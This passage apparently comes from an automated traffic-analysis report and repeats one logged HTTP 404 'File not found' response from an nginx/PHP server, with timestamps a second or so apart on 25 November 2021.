        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:25 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:25 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:26 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:26 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:27 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:28 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:28 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:28 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:29 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:30 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:30 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:31 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:31 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:31 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:32 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:32 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:33 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:34 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:34 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:34 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:35 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:36 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:36 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:37 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:37 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:38 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:38 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:39 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:39 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:40 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:40 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:41 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:41 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:42 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:42 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:43 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:43 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:44 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:44 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:45 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:45 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:46 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:46 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:47 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:47 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:48 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:48 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:49 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:49 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:50 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:50 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:51 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:51 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:52 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:52 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:53 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:53 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:54 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:54 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:55 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:55 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:56 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:56 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:57 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:57 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:58 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:58 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:59 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
